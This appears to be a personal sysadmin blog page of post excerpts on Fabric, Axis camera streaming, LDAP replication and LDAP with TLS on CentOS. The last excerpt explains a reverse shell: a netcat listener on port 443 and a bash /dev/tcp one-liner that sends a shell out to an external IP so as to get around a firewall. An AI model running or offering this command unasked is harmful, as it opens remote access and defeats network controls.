Computerglitch

An ongoing adventure

Fabric Quick Start

Sometimes I need a one-off command for a simple task and end up wrapping the command in a for loop that calls ssh and runs it over a few hosts. While this works great in a pinch, if I find myself using the same loop over and over I'll create a new definition in Fabric instead.

If you're unfamiliar with Fabric, this post attempts to get you up to speed with the basics of using it. First, let's get Fabric installed.

apt-get install gcc python-setuptools python-crypto
easy_install pip
pip install fabric

Fabric uses Paramiko, a Python SSH library. In the example fabfile below I'll be logging into remote nodes over SSH, so make sure your key-based or host-based authentication is already in place.

At this point we can create our first fabfile. I’m going to show you two basic but powerful features to get you started on your first fabfile. From this framework you should be able to start building a very nice fabfile to manage your nodes!

The beauty of Fabric is that it’s “just Python” so you’re free to do what you want with your fabfile.

Converting Axis RTSP to RTMP Streams

These are some notes I took while integrating live streaming from an Axis camera: a media server converted the stream from RTSP to RTMP, and the result was displayed on a website using Flowplayer. The following technologies were used to accomplish this configuration:

LDAP Replication

I recently had a project where I needed to provide replication for a CentOS 5 LDAP server. The slave (consumer) was going to be running CentOS 6. This post assumes you already have two working LDAP servers, fully resolvable, and that all ldapsearch queries respond appropriately.

For clarification:

Master (Provider in LDAP terms) - CentOS 5 server

Slave (Consumer in LDAP terms) - CentOS 6 server

On the Master:

Create a new account named replicate. Give the replicate account a password and make sure you can fully query the account from the Slave using ldapsearch.

An example ldapsearch to run from the Slave:

ldapsearch -h master.localdomain -p 389 -x -b "dc=localdomain,dc=com" -D "uid=replicate,ou=People,dc=localdomain,dc=com" -W

Add the following to slapd.conf on the Master:

vi /etc/openldap/slapd.conf

sizelimit    100000

access to *
    by self write
    by dn="cn=replicate,ou=People,dc=localdomain,dc=com" read
    by * read

CentOS 6.4 LDAP With TLS - Quick & Dirty

This post is an overview of the commands needed to set up a basic working LDAP TLS server on CentOS 6.4. I will also go over the process of creating a POSIX user account and a POSIX group. The archived version of this post is for CentOS 6 and can be found here: CentOS 6 LDAP With TLS

Add the following to your iptables configuration to allow access through the firewall, then install the required packages for your LDAP server.

/etc/sysconfig/iptables

-A INPUT -m state --state NEW -m tcp -p tcp --dport 389 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 636 -j ACCEPT

service iptables restart

yum install openldap-clients pam_ldap nss-pam-ldapd pam_krb5 sssd migrationtools openldap-servers openldap openldap-devel

Note: The steps for creating the certificates are crucial for TLS to work properly, and they have changed since CentOS 6.0.

Reverse Shell on CentOS

I wanted an easy way to get to the shell on my remote machine, bypassing the firewall, etc.

I'm going to refer to the systems as follows: OurSystem and TargetSystem.

On OurSystem we need to open a listening network connection using netcat. This can be any port we want, but I’m going to use port 443 because it’s allowed through firewalls.

nc -l 443

Note: Make sure the firewall isn't blocking the listening port you choose on OurSystem.

Next we need to force a bash shell back to OurSystem from TargetSystem. On TargetSystem execute the following, substituting 12.3.4.5 with the external IP of OurSystem and 443 with the port you set netcat to listen on.

bash -i >& /dev/tcp/12.3.4.5/443 0>&1

You should be greeted with a bash shell from TargetSystem on OurSystem.